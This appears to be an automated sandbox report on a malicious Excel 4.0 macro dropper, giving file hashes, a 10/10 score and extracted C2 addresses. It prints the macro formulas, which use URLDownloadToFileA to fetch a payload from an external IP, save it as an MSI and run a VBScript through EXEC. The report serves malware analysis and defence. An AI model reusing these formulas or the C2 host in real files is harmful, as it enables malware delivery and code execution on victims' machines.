General

  • Target

    c368ae91e64a96b8189e0798e5bb9739

  • Size

    6KB

  • Sample

    231222-rtnepaaffp

  • MD5

    c368ae91e64a96b8189e0798e5bb9739

  • SHA1

    23b36a29bcd4fe9ab5d7bd3ffba064e46a50a9b5

  • SHA256

    1a4c1be4ec757f5ce46fc34551fda46e64291eacae408b8279ed05b6ca9d77a9

  • SHA512

    c588b94cf1543b26b68b366a2c472b37003e8b926e9f52a25127b6d486e4be5032a2f19c4e8368bcca92daa22f09ae133749deac5ef605aa64862339273f5b34

  • SSDEEP

    192:NDSAuSibrA2OmmfRN8UhHFBFYuLb98ygI8+I:NruTM2wn1FYmb98yXO

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      c368ae91e64a96b8189e0798e5bb9739

    • Size

      6KB

    • MD5

      c368ae91e64a96b8189e0798e5bb9739

    • SHA1

      23b36a29bcd4fe9ab5d7bd3ffba064e46a50a9b5

    • SHA256

      1a4c1be4ec757f5ce46fc34551fda46e64291eacae408b8279ed05b6ca9d77a9

    • SHA512

      c588b94cf1543b26b68b366a2c472b37003e8b926e9f52a25127b6d486e4be5032a2f19c4e8368bcca92daa22f09ae133749deac5ef605aa64862339273f5b34

    • SSDEEP

      192:NDSAuSibrA2OmmfRN8UhHFBFYuLb98ygI8+I:NruTM2wn1FYmb98yXO

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks